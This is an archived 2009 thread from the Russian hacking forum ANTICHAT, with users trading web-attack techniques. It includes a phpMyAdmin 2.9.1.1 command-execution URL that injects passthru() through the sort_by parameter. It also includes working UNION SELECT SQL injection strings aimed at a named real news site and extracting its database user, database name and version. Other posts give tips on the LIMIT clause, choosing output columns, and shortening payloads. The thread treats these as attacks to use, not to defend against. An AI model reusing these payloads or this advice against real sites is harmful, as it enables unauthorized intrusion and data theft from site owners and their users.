ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
11.03.2009, 01:34
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от Велемир
Код:
Как использовать дыру в пхпмайадминке?:
http://127.0.0.1/pma/server_databases.php?pos=0&dbstats=0&sort_by=%22])%20OR%20passthru($_GET[ccmd]);%20//&sort_order=desc&token=[my_valid_token]&ccmd=ls
Мне выдаёт в Доступе отказано.Че за токен ставить я не знаю =_=.Посему прописал так,как выше...Версия 2.9.1.1
token - параметр в адресной строке. Например так - http://localhost/phpmyadmin/index.php?db=mysql&token=206136e5c98e1cd2fa26fbd10 4ebc700
|
|
|
11.03.2009, 01:54
|
|
Познающий
Регистрация: 18.03.2006
Сообщений: 47
Провел на форуме:
311345
Репутация:
9
|
|
http://comunist.md/index.php?idPaper=89/**/union+select+1,2,3,4,5,6,7+limit+1,1--
Обьясните пожалуйста зачем ставить в конце запроса
limit+1,1 . Почему не работает без LIMIT ?
(когда не получилось руками запустил в програме Sql Injection tool , и там есть галочка типа - использовать Limit 1,1 )
|
|
|
|
11.03.2009, 02:05
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Всё отлично работает
http://comunist.md/index.php?idPaper=-89 union select 1,2,concat_ws(0x3a,User(),Database(),Version()),4, 5,6,7--+
|
|
|
|
11.03.2009, 02:11
|
|
Познающий
Регистрация: 18.03.2006
Сообщений: 47
Провел на форуме:
311345
Репутация:
9
|
|
А всётаки зачем в Sql injection tool 4 есть параметр LIMIT 1,1 ? Почему например в моем случае надо его ставить,как именно я составил запрос. (я забыл что надо ставить несуществуюшие данные типа idPaper=-89 )
И что означает {1} (сами ковычки { } ) в проге Sql injection tool ?:
Printable fields : {1},3,4,5,6,7
Последний раз редактировалось Stalingrad; 11.03.2009 в 02:14..
|
|
|
|
11.03.2009, 02:22
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
2 Jokester,что делать если в скуле урезаются длина запроса
|
|
|
|
11.03.2009, 02:27
|
|
Постоянный
Регистрация: 15.06.2007
Сообщений: 527
Провел на форуме:
1734541
Репутация:
214
|
|
Сообщение от Stalingrad
А всётаки зачем в Sql injection tool 4 есть параметр LIMIT 1,1 ? Почему например в моем случае надо его ставить,как именно я составил запрос. (я забыл что надо ставить несуществуюшие данные типа idPaper=-89 )
И что означает {1} (сами ковычки { } ) в проге Sql injection tool ?:
Printable fields : {1},3,4,5,6,7
Printable fields ( ака печатное поле)
скобками ты выделяешь столбец в который выводить данные
{1},3,4,5,6,7 - в перввый
|
|
|
|
11.03.2009, 02:33
|
|
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181
Репутация:
688
|
|
Сообщение от Gorev
2 Jokester,что делать если в скуле урезаются длина запроса
запроса или вывода ? если вывода то через substring ... а может я и ошибаюсь ...
|
|
|
|
11.03.2009, 02:37
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
вывода извиняюсь, через substring я знаю, есть ли другой способ?
|
|
|
|
11.03.2009, 03:44
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
сокращать сам запрос, все двойные числа заменить на одинарные, ну т.е.
union+select+1,2,3,4,5,6,7,8,9,10,11,12,13
заменить на
union+select+1,2,3,4,5,6,7,8,9,0,1,2,3
для начала. Даже на этом пример съекономилось 4 символа
|
|
|
|
11.03.2009, 04:26
|
|
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181
Репутация:
688
|
|
Сообщение от Pashkela
сокращать сам запрос, все двойные числа заменить на одинарные, ну т.е.
union+select+1,2,3,4,5,6,7,8,9,10,11,12,13
заменить на
union+select+1,2,3,4,5,6,7,8,9,0,1,2,3
для начала. Даже на этом пример съекономилось 4 символа
мы тут про вывод  
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
